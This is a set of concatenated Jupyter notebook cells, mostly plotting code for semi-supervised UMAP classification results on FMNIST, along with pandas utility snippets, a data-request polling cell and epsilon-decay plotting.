t1=States_track['x-2-x-x-x-x-5-x-x'][(5,7)]
plt.title("(s,a)='x-2-x-x-x-x-5-x-x',(5,7)")
plt.plot(np.asarray(range(0, len(t1))),np.asarray(t1))
plt.subplot(242)
t2=States_track['1-x-x-x-x-4-x-x-x'][(7,5)]
plt.title("(s,a)='1-x-x-x-x-4-x-x-x',(7,5)")
plt.plot(np.asarray(range(0, len(t2))),np.asarray(t2))
plt.subplot(243)
t3=States_track['9-x-3-x-4-x-x-x-8'][(1,1)]
plt.title("(s,a)='9-x-3-x-4-x-x-x-8',(1,1)")
plt.plot(np.asarray(range(0, len(t3))),np.asarray(t3))
plt.subplot(244)
t4=States_track['x-8-5-x-4-x-x-1-x'][(6,9)]
plt.title("(s,a)='x-8-5-x-4-x-x-1-x',(6,9)")
plt.plot(np.asarray(range(0, len(t4))),np.asarray(t4))
plt.show()
###Output
_____no_output_____
###Markdown
Epsilon - decay check
###Code
max_epsilon = 1.0
min_epsilon = 0.001
time = np.arange(0,5000000)
epsilon = []
for i in range(0,5000000):
epsilon.append(min_epsilon + (max_epsilon - min_epsilon) * np.exp(-0.000001*i))
plt.plot(time, epsilon)
plt.show()
###Output
_____no_output_____ |
docs/_sources/python/pandas.ipynb | ###Markdown
Pandas count unique words in a column
###Code
results = set()
df['text'].str.lower().str.split().apply(results.update)
n_words = len(results)
n_words
###Output
_____no_output_____
###Markdown
Random sample for each class
###Code
def random_balance_subset(df, n=2000):
"""select random n sample for each class
Args:
df (df): with y label as e.g. [0, 1]
n (int): num
"""
list_of_dataframes = []
ys = list(df['y'].unique())
for y in ys:
subsample = df[df['y'] == y].sample(n=n, random_state=CONFIG['seed'])
list_of_dataframes.append(subsample)
res = pd.concat(list_of_dataframes)
return res
df_mini = random_balance_subset(df)
df_mini['y'].value_counts()
###Output
_____no_output_____
###Markdown
convert dataframe to csv
###Code
df.to_csv('train_mini.csv')
###Output
_____no_output_____
###Markdown
index reset
###Code
df.reset_index(drop=True, inplace=True)
###Output
_____no_output_____ |
notebooks/E_datarequest.ipynb | ###Markdown
WARNING Data request lines are commented out to prevent accidental resubmission when running through the entire notebook quickly.
###Code
print(data_request_url)
#Data Request Line
r = requests.get(data_request_url, params=params, auth=(username, token))
data = r.json()
%%time
check_complete = data['allURLs'][1] + '/status.txt'
for i in range(1800):
r = requests.get(check_complete)
if r.status_code == requests.codes.ok:
print('request completed')
break
else:
time.sleep(1)
print(data['allURLs'][0])
###Output
_____no_output_____ |
notebooks/semisupervised/FMNIST/fmnist-plot-results.ipynb | ###Markdown
View UMAP results for baseline
###Code
import pandas as pd
import numpy as np
import seaborn as sns
import matplotlib.pyplot as plt
from tfumap.paths import FIGURE_DIR, save_fig
from tfumap.paths import MODEL_DIR
from tfumap.semisupervised_keras import pretrained_networks
dataset = "fmnist"
datasets = [dataset]
aug_types = [
"not_augmented",
"umap_euclidean",
"umap_learned",
"augmented",
"umap_augmented_learned",
"umap_euclidean_augmented",
"umap_over_z"
]
dset_sizes = [4, 16, 64, 256, 1024, "full"]
results_loc = MODEL_DIR / 'semisupervised-keras'
results_df = pd.DataFrame(columns=['dataset', 'labels_per_class', 'augmented', 'timestamp', 'location', 'test_acc', 'dset_size_title'])
for dataset in datasets:
for aug_type in aug_types:
for dset_size in dset_sizes:
dset_timestamp = pretrained_networks[dataset][aug_type][dset_size]
dset_loc = results_loc / dataset/ str(dset_size) / dset_timestamp
loc_list = list(dset_loc.glob('test_loss.npy'))
if dset_size == 'full':
if aug_type == 'augmented':
print(loc_list)
print(aug_type)
if len(loc_list) == 0:
print(aug_type, dset_size, dataset, dset_loc)
continue
test_loss, test_acc = np.load(loc_list[0])
dset_size_title = str(dset_size)
dset_size = str(dset_size) if dset_size is not 'full' else 4096
results_df.loc[len(results_df)] = [
dataset, dset_size, aug_type, dset_timestamp, dset_loc, test_acc, dset_size_title
]
results_df
pal = sns.color_palette('tab20c',20)
sns.palplot(pal)
color_list = [
{
"mask": results_df.augmented == 'not_augmented',
"color": pal[16],
"ls": 'solid',
"marker": 'o',
"label": "Baseline"
},
{
"mask": results_df.augmented == 'umap_euclidean',
"color": pal[0],
"ls": 'solid',
"marker": 'o',
"label": "+ UMAP (euclidean)"
},
]
alpha = 0.75
linewidth = 2
fig, (ax, ax2) = plt.subplots(
1,
2,
figsize=(5, 5),
dpi=100,
sharey=True,
gridspec_kw={"width_ratios": [5, 1], "wspace": 0.05},
)
for li, col_dict in enumerate(color_list):
mask = col_dict["mask"]
color = col_dict['color']
ls = col_dict['ls']
label = col_dict['label']
marker = col_dict['marker']
subset_ds = results_df[mask]
subset_ds = subset_ds[subset_ds.dset_size_title != "full"]
nex = subset_ds.labels_per_class.values.astype("int")
acc = subset_ds.test_acc.values
ax.scatter(nex, 1-acc, color=color, s=50, alpha=1, marker=marker)#, facecolors="none")
ax.plot(nex, 1-acc, linewidth=linewidth, alpha=alpha, color=color, ls=ls) # , label = label
subset_ds = results_df[mask]
subset_ds = subset_ds[subset_ds.dset_size_title == "full"]
#display(subset_ds)
nex = subset_ds.labels_per_class.values.astype("int")
acc = subset_ds.test_acc.values
nex = nex + li/100 - len(color_list)/2/100#+(np.random.rand(1)-0.5)*.025
ax2.scatter(nex, 1-acc, color=color, s=50, alpha=1, marker=marker)#, facecolors="none")
ax.plot(
[],
[],
"-" + marker,
color=color,
linewidth=linewidth,
label=label,
alpha=alpha,
markersize=7,
#markerfacecolor="none",
ls=ls,
)
ax.set_xscale("log")
ax.set_xticks([4, 16, 64, 256, 1024])
ax.set_xticklabels([4, 16, 64, 256, 1024])
#ax.set_ylim([0, 1])
ax.spines["right"].set_visible(False)
ax.legend()
ax.set_xlim([2, 2048])
# ax2.set_xscale('log')
ax2.set_xticks([4096])
ax2.set_xticklabels(["full"])
ax2.spines["left"].set_visible(False)
ax2.yaxis.tick_right()
d = 0.015 # how big to make the diagonal lines in axes coordinates
# arguments to pass plot, just so we don't keep repeating them
kwargs = dict(transform=ax.transAxes, color="k", clip_on=False)
ax.plot((1 - d, 1 + d), (-d, +d), **kwargs)
ax.plot((1 - d, 1 + d), (1 - d, 1 + d), **kwargs)
d = 0.015
offset = 5
kwargs.update(transform=ax2.transAxes) # switch to the bottom axes
ax2.plot((-d * offset, +d * offset), (1 - d, 1 + d), **kwargs)
ax2.plot((-d * offset, +d * offset), (-d, +d), **kwargs)
ax.minorticks_on()
ax.tick_params(axis="y", which="minor", direction="out")
if False:
ax.grid(axis="y", which="major", linestyle="-", alpha=0.5)
ax.grid(axis="y", which="minor", linestyle="--", alpha=0.5)
ax2.grid(axis="y", which="major", linestyle="-", alpha=0.5)
ax2.grid(axis="y", which="minor", linestyle="--", alpha=0.5)
if False:
ax.set_ylim([5e-2, 1])
ax2.set_yscale('log')
ax.set_title('CIFAR10')
ax.set_ylabel('Classification Error')
ax.set_xlabel('# Training Examples')
color_list = [
{
"mask": results_df.augmented == 'not_augmented',
"color": pal[16],
"ls": 'solid',
"marker": 'o',
"label": "Baseline"
},
{
"mask": results_df.augmented == 'umap_euclidean',
"color": pal[0],
"ls": 'solid',
"marker": 'o',
"label": "+ UMAP (Euclidean)"
},
]
alpha = 0.75
linewidth = 2
fig, (ax, ax2) = plt.subplots(
1,
2,
figsize=(5, 3),
dpi=100,
sharey=True,
gridspec_kw={"width_ratios": [5, 1], "wspace": 0.05},
)
for li, col_dict in enumerate(color_list):
mask = col_dict["mask"]
color = col_dict['color']
ls = col_dict['ls']
label = col_dict['label']
marker = col_dict['marker']
subset_ds = results_df[mask]
subset_ds = subset_ds[subset_ds.dset_size_title != "full"]
nex = subset_ds.labels_per_class.values.astype("int")
acc = subset_ds.test_acc.values
ax.scatter(nex, acc, color=color, s=50, alpha=1, marker=marker)#, facecolors="none")
ax.plot(nex, acc, linewidth=linewidth, alpha=alpha, color=color, ls=ls) # , label = label
subset_ds = results_df[mask]
subset_ds = subset_ds[subset_ds.dset_size_title == "full"]
#display(subset_ds)
nex = subset_ds.labels_per_class.values.astype("int")
acc = subset_ds.test_acc.values
nex = nex + li/100 - len(color_list)/2/100#+(np.random.rand(1)-0.5)*.025
ax2.scatter(nex, acc, color=color, s=50, alpha=1, marker=marker)#, facecolors="none")
ax.plot(
[],
[],
"-" + marker,
color=color,
linewidth=linewidth,
label=label,
alpha=alpha,
markersize=7,
#markerfacecolor="none",
ls=ls,
)
ax.set_xscale("log")
ax.set_xticks([4, 16, 64, 256, 1024])
ax.set_xticklabels([4, 16, 64, 256, 1024])
#ax.set_ylim([0, 1])
ax.spines["right"].set_visible(False)
ax.legend()
ax.set_xlim([2, 2048])
# ax2.set_xscale('log')
ax2.set_xticks([4096])
ax2.set_xticklabels(["full"])
ax2.spines["left"].set_visible(False)
ax2.yaxis.tick_right()
d = 0.015 # how big to make the diagonal lines in axes coordinates
# arguments to pass plot, just so we don't keep repeating them
kwargs = dict(transform=ax.transAxes, color="k", clip_on=False)
ax.plot((1 - d, 1 + d), (-d, +d), **kwargs)
ax.plot((1 - d, 1 + d), (1 - d, 1 + d), **kwargs)
d = 0.015
offset = 5
kwargs.update(transform=ax2.transAxes) # switch to the bottom axes
ax2.plot((-d * offset, +d * offset), (1 - d, 1 + d), **kwargs)
ax2.plot((-d * offset, +d * offset), (-d, +d), **kwargs)
ax.minorticks_on()
ax.tick_params(axis="y", which="minor", direction="out")
if False:
ax.grid(axis="y", which="major", linestyle="-", alpha=0.5)
ax.grid(axis="y", which="minor", linestyle="--", alpha=0.5)
ax2.grid(axis="y", which="major", linestyle="-", alpha=0.5)
ax2.grid(axis="y", which="minor", linestyle="--", alpha=0.5)
if False:
ax.set_ylim([5e-2, 1])
ax2.set_yscale('log')
ax.set_title(dataset.upper(), x=0.605)
ax.set_ylabel('Accuracy')
ax.set_xlabel('# Training Examples', x=0.605)
#save_fig(FIGURE_DIR/(dataset + '_umap_euclidean'), save_pdf = True)
color_list = [
{
"mask": results_df.augmented == 'not_augmented',
"color": pal[16],
"ls": 'solid',
"marker": 'o',
"label": "Baseline"
},
{
"mask": results_df.augmented == 'umap_learned',
"color": pal[4],
"ls": 'solid',
"marker": 'o',
"label": "+ UMAP (learned)"
},
]
alpha = 0.75
linewidth = 2
fig, (ax, ax2) = plt.subplots(
1,
2,
figsize=(5, 3),
dpi=100,
sharey=True,
gridspec_kw={"width_ratios": [5, 1], "wspace": 0.05},
)
for li, col_dict in enumerate(color_list):
mask = col_dict["mask"]
color = col_dict['color']
ls = col_dict['ls']
label = col_dict['label']
marker = col_dict['marker']
subset_ds = results_df[mask]
subset_ds = subset_ds[subset_ds.dset_size_title != "full"]
nex = subset_ds.labels_per_class.values.astype("int")
acc = subset_ds.test_acc.values
ax.scatter(nex, acc, color=color, s=50, alpha=1, marker=marker)#, facecolors="none")
ax.plot(nex, acc, linewidth=linewidth, alpha=alpha, color=color, ls=ls) # , label = label
subset_ds = results_df[mask]
subset_ds = subset_ds[subset_ds.dset_size_title == "full"]
#display(subset_ds)
nex = subset_ds.labels_per_class.values.astype("int")
acc = subset_ds.test_acc.values
nex = nex + li/100 - len(color_list)/2/100#+(np.random.rand(1)-0.5)*.025
ax2.scatter(nex, acc, color=color, s=50, alpha=1, marker=marker)#, facecolors="none")
ax.plot(
[],
[],
"-" + marker,
color=color,
linewidth=linewidth,
label=label,
alpha=alpha,
markersize=7,
#markerfacecolor="none",
ls=ls,
)
ax.set_xscale("log")
ax.set_xticks([4, 16, 64, 256, 1024])
ax.set_xticklabels([4, 16, 64, 256, 1024])
#ax.set_ylim([0, 1])
ax.spines["right"].set_visible(False)
ax.legend()
ax.set_xlim([2, 2048])
# ax2.set_xscale('log')
ax2.set_xticks([4096])
ax2.set_xticklabels(["full"])
ax2.spines["left"].set_visible(False)
ax2.yaxis.tick_right()
d = 0.015 # how big to make the diagonal lines in axes coordinates
# arguments to pass plot, just so we don't keep repeating them
kwargs = dict(transform=ax.transAxes, color="k", clip_on=False)
ax.plot((1 - d, 1 + d), (-d, +d), **kwargs)
ax.plot((1 - d, 1 + d), (1 - d, 1 + d), **kwargs)
d = 0.015
offset = 5
kwargs.update(transform=ax2.transAxes) # switch to the bottom axes
ax2.plot((-d * offset, +d * offset), (1 - d, 1 + d), **kwargs)
ax2.plot((-d * offset, +d * offset), (-d, +d), **kwargs)
ax.minorticks_on()
ax.tick_params(axis="y", which="minor", direction="out")
if False:
ax.grid(axis="y", which="major", linestyle="-", alpha=0.5)
ax.grid(axis="y", which="minor", linestyle="--", alpha=0.5)
ax2.grid(axis="y", which="major", linestyle="-", alpha=0.5)
ax2.grid(axis="y", which="minor", linestyle="--", alpha=0.5)
if False:
ax.set_ylim([5e-2, 1])
ax2.set_yscale('log')
ax.set_title(dataset.upper(), x=0.605)
ax.set_ylabel('Classification Acc.')
ax.set_xlabel('# Training Examples', x=0.605)
color_list = [
{
"mask": results_df.augmented == 'not_augmented',
"color": pal[16],
"ls": 'solid',
"marker": 'o',
"label": "Baseline"
},
{
"mask": results_df.augmented == 'umap_learned',
"color": pal[4],
"ls": 'solid',
"marker": 'o',
"label": "+ UMAP (learned)"
},
{
"mask": results_df.augmented == 'umap_intersection',
"color": pal[8],
"ls": 'solid',
"marker": 'o',
"label": "+ UMAP (intersection)"
},
{
"mask": results_df.augmented == 'umap_euclidean',
"color": pal[0],
"ls": 'solid',
"marker": 'o',
"label": "+ UMAP (Euclidean)"
},
]
alpha = 0.75
linewidth = 2
fig, (ax, ax2) = plt.subplots(
1,
2,
figsize=(5, 3),
dpi=100,
sharey=True,
gridspec_kw={"width_ratios": [5, 1], "wspace": 0.05},
)
for li, col_dict in enumerate(color_list):
mask = col_dict["mask"]
color = col_dict['color']
ls = col_dict['ls']
label = col_dict['label']
marker = col_dict['marker']
subset_ds = results_df[mask]
subset_ds = subset_ds[subset_ds.dset_size_title != "full"]
nex = subset_ds.labels_per_class.values.astype("int")
acc = subset_ds.test_acc.values
ax.scatter(nex, acc, color=color, s=50, alpha=1, marker=marker)#, facecolors="none")
ax.plot(nex, acc, linewidth=linewidth, alpha=alpha, color=color, ls=ls) # , label = label
subset_ds = results_df[mask]
subset_ds = subset_ds[subset_ds.dset_size_title == "full"]
#display(subset_ds)
nex = subset_ds.labels_per_class.values.astype("int")
acc = subset_ds.test_acc.values
nex = nex + li/100 - len(color_list)/2/100#+(np.random.rand(1)-0.5)*.025
ax2.scatter(nex, acc, color=color, s=50, alpha=1, marker=marker)#, facecolors="none")
ax.plot(
[],
[],
"-" + marker,
color=color,
linewidth=linewidth,
label=label,
alpha=alpha,
markersize=7,
#markerfacecolor="none",
ls=ls,
)
ax.set_xscale("log")
ax.set_xticks([4, 16, 64, 256, 1024])
ax.set_xticklabels([4, 16, 64, 256, 1024])
#ax.set_ylim([0, 1])
ax.spines["right"].set_visible(False)
ax.legend()
ax.set_xlim([2, 2048])
# ax2.set_xscale('log')
ax2.set_xticks([4096])
ax2.set_xticklabels(["full"])
ax2.spines["left"].set_visible(False)
ax2.yaxis.tick_right()
d = 0.015 # how big to make the diagonal lines in axes coordinates
# arguments to pass plot, just so we don't keep repeating them
kwargs = dict(transform=ax.transAxes, color="k", clip_on=False)
ax.plot((1 - d, 1 + d), (-d, +d), **kwargs)
ax.plot((1 - d, 1 + d), (1 - d, 1 + d), **kwargs)
d = 0.015
offset = 5
kwargs.update(transform=ax2.transAxes) # switch to the bottom axes
ax2.plot((-d * offset, +d * offset), (1 - d, 1 + d), **kwargs)
ax2.plot((-d * offset, +d * offset), (-d, +d), **kwargs)
ax.minorticks_on()
ax.tick_params(axis="y", which="minor", direction="out")
if False:
ax.grid(axis="y", which="major", linestyle="-", alpha=0.5)
ax.grid(axis="y", which="minor", linestyle="--", alpha=0.5)
ax2.grid(axis="y", which="major", linestyle="-", alpha=0.5)
ax2.grid(axis="y", which="minor", linestyle="--", alpha=0.5)
if False:
ax.set_ylim([5e-2, 1])
ax2.set_yscale('log')
ax.set_title(dataset.upper(), x=0.605)
ax.set_ylabel('Classification Acc.')
ax.set_xlabel('# Training Examples', x=0.605)
color_list = [
{
"mask": results_df.augmented == 'not_augmented',
"color": pal[16],
"ls": 'solid',
"marker": 'o',
"label": "Baseline"
},
{
"mask": results_df.augmented == 'augmented',
"color": pal[16],
"ls": 'dashed',
"marker": 'X',
"label": "+ Aug."
},
{
"mask": results_df.augmented == 'umap_augmented_learned',
"color": pal[4],
"ls": 'dashed',
"marker": 'X',
"label": "+Aug + UMAP (learned)"
},
{
"mask": results_df.augmented == 'umap_learned',
"color": pal[4],
"ls": 'solid',
"marker": 'o',
"label": "+ UMAP (learned)"
},
]
alpha = 0.75
linewidth = 2
fig, (ax, ax2) = plt.subplots(
1,
2,
figsize=(5, 3),
dpi=100,
sharey=True,
gridspec_kw={"width_ratios": [5, 1], "wspace": 0.05},
)
for li, col_dict in enumerate(color_list):
mask = col_dict["mask"]
color = col_dict['color']
ls = col_dict['ls']
label = col_dict['label']
marker = col_dict['marker']
subset_ds = results_df[mask]
subset_ds = subset_ds[subset_ds.dset_size_title != "full"]
nex = subset_ds.labels_per_class.values.astype("int")
acc = subset_ds.test_acc.values
ax.scatter(nex, acc, color=color, s=50, alpha=1, marker=marker)#, facecolors="none")
ax.plot(nex, acc, linewidth=linewidth, alpha=alpha, color=color, ls=ls) # , label = label
subset_ds = results_df[mask]
subset_ds = subset_ds[subset_ds.dset_size_title == "full"]
#display(subset_ds)
nex = subset_ds.labels_per_class.values.astype("int")
acc = subset_ds.test_acc.values
nex = nex + li/100 - len(color_list)/2/100#+(np.random.rand(1)-0.5)*.025
ax2.scatter(nex, acc, ls=ls, color=color, s=50, alpha=1, marker=marker)#, facecolors="none")
ax.plot(
[],
[],
"-" + marker,
color=color,
linewidth=linewidth,
label=label,
alpha=alpha,
markersize=7,
#markerfacecolor="none",
ls=ls,
)
ax.set_xscale("log")
ax.set_xticks([4, 16, 64, 256, 1024])
ax.set_xticklabels([4, 16, 64, 256, 1024])
#ax.set_ylim([0, 1])
ax.spines["right"].set_visible(False)
ax.legend()
ax.set_xlim([2, 2048])
# ax2.set_xscale('log')
ax2.set_xticks([4096])
ax2.set_xticklabels(["full"])
ax2.spines["left"].set_visible(False)
ax2.yaxis.tick_right()
d = 0.015 # how big to make the diagonal lines in axes coordinates
# arguments to pass plot, just so we don't keep repeating them
kwargs = dict(transform=ax.transAxes, color="k", clip_on=False)
ax.plot((1 - d, 1 + d), (-d, +d), **kwargs)
ax.plot((1 - d, 1 + d), (1 - d, 1 + d), **kwargs)
d = 0.015
offset = 5
kwargs.update(transform=ax2.transAxes) # switch to the bottom axes
ax2.plot((-d * offset, +d * offset), (1 - d, 1 + d), **kwargs)
ax2.plot((-d * offset, +d * offset), (-d, +d), **kwargs)
ax.minorticks_on()
ax.tick_params(axis="y", which="minor", direction="out")
if False:
ax.grid(axis="y", which="major", linestyle="-", alpha=0.5)
ax.grid(axis="y", which="minor", linestyle="--", alpha=0.5)
ax2.grid(axis="y", which="major", linestyle="-", alpha=0.5)
ax2.grid(axis="y", which="minor", linestyle="--", alpha=0.5)
if False:
ax.set_ylim([5e-2, 1])
ax2.set_yscale('log')
ax.set_title(dataset.upper(), x=0.605)
ax.set_ylabel('Classification Acc.')
ax.set_xlabel('# Training Examples', x=0.605)
ymin, ymax = ax.get_ylim()
ymax = 1
ax.set_ylim([ymin, ymax])
color_list = [
{
"mask": results_df.augmented == 'not_augmented',
"color": pal[16],
"ls": 'solid',
"marker": 'o',
"label": "Baseline"
},
{
"mask": results_df.augmented == 'augmented',
"color": pal[16],
"ls": 'dashed',
"marker": 'X',
"label": "+ Aug."
},
{
"mask": results_df.augmented == 'umap_augmented_learned',
"color": pal[4],
"ls": 'dashed',
"marker": 'X',
"label": "+Aug + UMAP (learned)"
},
#{
# "mask": results_df.augmented == 'umap_learned',
# "color": pal[4],
# "ls": 'solid',
# "marker": 'o',
# "label": "+ UMAP (learned)"
#},
]
alpha = 0.75
linewidth = 2
fig, (ax, ax2) = plt.subplots(
1,
2,
figsize=(5, 3),
dpi=100,
sharey=True,
gridspec_kw={"width_ratios": [5, 1], "wspace": 0.05},
)
for li, col_dict in enumerate(color_list):
mask = col_dict["mask"]
color = col_dict['color']
ls = col_dict['ls']
label = col_dict['label']
marker = col_dict['marker']
subset_ds = results_df[mask]
subset_ds = subset_ds[subset_ds.dset_size_title != "full"]
nex = subset_ds.labels_per_class.values.astype("int")
acc = subset_ds.test_acc.values
ax.scatter(nex, acc, color=color, s=50, alpha=1, marker=marker)#, facecolors="none")
ax.plot(nex, acc, linewidth=linewidth, alpha=alpha, color=color, ls=ls) # , label = label
subset_ds = results_df[mask]
subset_ds = subset_ds[subset_ds.dset_size_title == "full"]
#display(subset_ds)
nex = subset_ds.labels_per_class.values.astype("int")
acc = subset_ds.test_acc.values
nex = nex + li/100 - len(color_list)/2/100#+(np.random.rand(1)-0.5)*.025
ax2.scatter(nex, acc, ls=ls, color=color, s=50, alpha=1, marker=marker)#, facecolors="none")
ax.plot(
[],
[],
"-" + marker,
color=color,
linewidth=linewidth,
label=label,
alpha=alpha,
markersize=7,
#markerfacecolor="none",
ls=ls,
)
ax.set_xscale("log")
ax.set_xticks([4, 16, 64, 256, 1024])
ax.set_xticklabels([4, 16, 64, 256, 1024])
#ax.set_ylim([0, 1])
ax.spines["right"].set_visible(False)
ax.legend()
ax.set_xlim([2, 2048])
# ax2.set_xscale('log')
ax2.set_xticks([4096])
ax2.set_xticklabels(["full"])
ax2.spines["left"].set_visible(False)
ax2.yaxis.tick_right()
d = 0.015 # how big to make the diagonal lines in axes coordinates
# arguments to pass plot, just so we don't keep repeating them
kwargs = dict(transform=ax.transAxes, color="k", clip_on=False)
ax.plot((1 - d, 1 + d), (-d, +d), **kwargs)
ax.plot((1 - d, 1 + d), (1 - d, 1 + d), **kwargs)
d = 0.015
offset = 5
kwargs.update(transform=ax2.transAxes) # switch to the bottom axes
ax2.plot((-d * offset, +d * offset), (1 - d, 1 + d), **kwargs)
ax2.plot((-d * offset, +d * offset), (-d, +d), **kwargs)
ax.minorticks_on()
ax.tick_params(axis="y", which="minor", direction="out")
if False:
ax.grid(axis="y", which="major", linestyle="-", alpha=0.5)
ax.grid(axis="y", which="minor", linestyle="--", alpha=0.5)
ax2.grid(axis="y", which="major", linestyle="-", alpha=0.5)
ax2.grid(axis="y", which="minor", linestyle="--", alpha=0.5)
if False:
ax.set_ylim([5e-2, 1])
ax2.set_yscale('log')
ax.set_title(dataset.upper(), x=0.605)
ax.set_ylabel('Classification Acc.')
ax.set_xlabel('# Training Examples', x=0.605)
color_list = [
{
"mask": results_df.augmented == 'not_augmented',
"color": pal[16],
"ls": 'solid',
"marker": 'o',
"label": "Baseline"
},
{
"mask": results_df.augmented == 'augmented',
"color": pal[16],
"ls": 'dashed',
"marker": 'X',
"label": "+ Aug."
},
#{
# "mask": results_df.augmented == 'umap_euclidean',
# "color": pal[0],
# "ls": 'solid',
# "marker": 'o',
# "label": "+ UMAP (Euclidean)"
#},
{
"mask": results_df.augmented == 'umap_euclidean_augmented',
"color": pal[0],
"ls": 'dashed',
"marker": 'X',
"label": "+ Aug. + UMAP (Euclidean)"
},
]
alpha = 0.75
linewidth = 2
fig, (ax, ax2) = plt.subplots(
1,
2,
figsize=(5, 3),
dpi=100,
sharey=True,
gridspec_kw={"width_ratios": [5, 1], "wspace": 0.05},
)
for li, col_dict in enumerate(color_list):
mask = col_dict["mask"]
color = col_dict['color']
ls = col_dict['ls']
label = col_dict['label']
marker = col_dict['marker']
subset_ds = results_df[mask]
subset_ds = subset_ds[subset_ds.dset_size_title != "full"]
nex = subset_ds.labels_per_class.values.astype("int")
acc = subset_ds.test_acc.values
ax.scatter(nex, acc, color=color, s=50, alpha=1, marker=marker)#, facecolors="none")
ax.plot(nex, acc, linewidth=linewidth, alpha=alpha, color=color, ls=ls) # , label = label
subset_ds = results_df[mask]
subset_ds = subset_ds[subset_ds.dset_size_title == "full"]
#display(subset_ds)
nex = subset_ds.labels_per_class.values.astype("int")
acc = subset_ds.test_acc.values
nex = nex + li/100 - len(color_list)/2/100#+(np.random.rand(1)-0.5)*.025
ax2.scatter(nex, acc, ls=ls, color=color, s=50, alpha=1, marker=marker)#, facecolors="none")
ax.plot(
[],
[],
"-" + marker,
color=color,
linewidth=linewidth,
label=label,
alpha=alpha,
markersize=7,
#markerfacecolor="none",
ls=ls,
)
ax.set_xscale("log")
ax.set_xticks([4, 16, 64, 256, 1024])
ax.set_xticklabels([4, 16, 64, 256, 1024])
#ax.set_ylim([0, 1])
ax.spines["right"].set_visible(False)
ax.legend()
ax.set_xlim([2, 2048])
# ax2.set_xscale('log')
ax2.set_xticks([4096])
ax2.set_xticklabels(["full"])
ax2.spines["left"].set_visible(False)
ax2.yaxis.tick_right()
d = 0.015 # how big to make the diagonal lines in axes coordinates
# arguments to pass plot, just so we don't keep repeating them
kwargs = dict(transform=ax.transAxes, color="k", clip_on=False)
ax.plot((1 - d, 1 + d), (-d, +d), **kwargs)
ax.plot((1 - d, 1 + d), (1 - d, 1 + d), **kwargs)
d = 0.015
offset = 5
kwargs.update(transform=ax2.transAxes) # switch to the bottom axes
ax2.plot((-d * offset, +d * offset), (1 - d, 1 + d), **kwargs)
ax2.plot((-d * offset, +d * offset), (-d, +d), **kwargs)
ax.minorticks_on()
ax.tick_params(axis="y", which="minor", direction="out")
if False:
ax.grid(axis="y", which="major", linestyle="-", alpha=0.5)
ax.grid(axis="y", which="minor", linestyle="--", alpha=0.5)
ax2.grid(axis="y", which="major", linestyle="-", alpha=0.5)
ax2.grid(axis="y", which="minor", linestyle="--", alpha=0.5)
if False:
ax.set_ylim([5e-2, 1])
ax2.set_yscale('log')
ax.set_title(dataset.upper(), x=0.605)
ax.set_ylabel('Classification Acc.')
ax.set_xlabel('# Training Examples', x=0.605)
color_list = [
{
"mask": results_df.augmented == 'not_augmented',
"color": pal[16],
"ls": 'solid',
"marker": 'o',
"label": "Baseline"
},
{
"mask": results_df.augmented == 'augmented',
"color": pal[16],
"ls": 'dashed',
"marker": 'X',
"label": "+ Aug."
},
{
"mask": results_df.augmented == 'umap_euclidean',
"color": pal[0],
"ls": 'solid',
"marker": 'o',
"label": "+ UMAP (Euclidean)"
},
{
"mask": results_df.augmented == 'umap_euclidean_augmented',
"color": pal[0],
"ls": 'dashed',
"marker": 'X',
"label": "+ Aug. + UMAP (Euclidean)"
},
]
alpha = 0.75
linewidth = 2
fig, (ax, ax2) = plt.subplots(
1,
2,
figsize=(5, 3),
dpi=100,
sharey=True,
gridspec_kw={"width_ratios": [5, 1], "wspace": 0.05},
)
for li, col_dict in enumerate(color_list):
mask = col_dict["mask"]
color = col_dict['color']
ls = col_dict['ls']
label = col_dict['label']
marker = col_dict['marker']
subset_ds = results_df[mask]
subset_ds = subset_ds[subset_ds.dset_size_title != "full"]
nex = subset_ds.labels_per_class.values.astype("int")
acc = subset_ds.test_acc.values
ax.scatter(nex, acc, color=color, s=50, alpha=1, marker=marker)#, facecolors="none")
ax.plot(nex, acc, linewidth=linewidth, alpha=alpha, color=color, ls=ls) # , label = label
subset_ds = results_df[mask]
subset_ds = subset_ds[subset_ds.dset_size_title == "full"]
#display(subset_ds)
nex = subset_ds.labels_per_class.values.astype("int")
acc = subset_ds.test_acc.values
nex = nex + li/100 - len(color_list)/2/100#+(np.random.rand(1)-0.5)*.025
ax2.scatter(nex, acc, ls=ls, color=color, s=50, alpha=1, marker=marker)#, facecolors="none")
ax.plot(
[],
[],
"-" + marker,
color=color,
linewidth=linewidth,
label=label,
alpha=alpha,
markersize=7,
#markerfacecolor="none",
ls=ls,
)
ax.set_xscale("log")
ax.set_xticks([4, 16, 64, 256, 1024])
ax.set_xticklabels([4, 16, 64, 256, 1024])
#ax.set_ylim([0, 1])
ax.spines["right"].set_visible(False)
ax.legend()
ax.set_xlim([2, 2048])
# ax2.set_xscale('log')
ax2.set_xticks([4096])
ax2.set_xticklabels(["full"])
ax2.spines["left"].set_visible(False)
ax2.yaxis.tick_right()
d = 0.015 # how big to make the diagonal lines in axes coordinates
# arguments to pass plot, just so we don't keep repeating them
kwargs = dict(transform=ax.transAxes, color="k", clip_on=False)
ax.plot((1 - d, 1 + d), (-d, +d), **kwargs)
ax.plot((1 - d, 1 + d), (1 - d, 1 + d), **kwargs)
d = 0.015
offset = 5
kwargs.update(transform=ax2.transAxes) # switch to the bottom axes
ax2.plot((-d * offset, +d * offset), (1 - d, 1 + d), **kwargs)
ax2.plot((-d * offset, +d * offset), (-d, +d), **kwargs)
ax.minorticks_on()
ax.tick_params(axis="y", which="minor", direction="out")
if False:
ax.grid(axis="y", which="major", linestyle="-", alpha=0.5)
ax.grid(axis="y", which="minor", linestyle="--", alpha=0.5)
ax2.grid(axis="y", which="major", linestyle="-", alpha=0.5)
ax2.grid(axis="y", which="minor", linestyle="--", alpha=0.5)
if False:
ax.set_ylim([5e-2, 1])
ax2.set_yscale('log')
ax.set_title(dataset.upper(), x=0.605)
ax.set_ylabel('Classification Acc.')
ax.set_xlabel('# Training Examples', x=0.605)
color_list = [
{
"mask": results_df.augmented == 'not_augmented',
"color": pal[16],
"ls": 'solid',
"marker": 'o',
"label": "Baseline"
},
{
"mask": results_df.augmented == 'umap_over_z',
"color": pal[8],
"ls": 'dashed',
"marker": 'X',
"label": "UMAP (learned z)"
},
#{
# "mask": results_df.augmented == 'umap_learned',
# "color": pal[4],
# "ls": 'solid',
# "marker": 'o',
# "label": "+ UMAP (learned)"
#},
]
alpha = 0.75
linewidth = 2
fig, (ax, ax2) = plt.subplots(
1,
2,
figsize=(5, 3),
dpi=100,
sharey=True,
gridspec_kw={"width_ratios": [5, 1], "wspace": 0.05},
)
for li, col_dict in enumerate(color_list):
mask = col_dict["mask"]
color = col_dict['color']
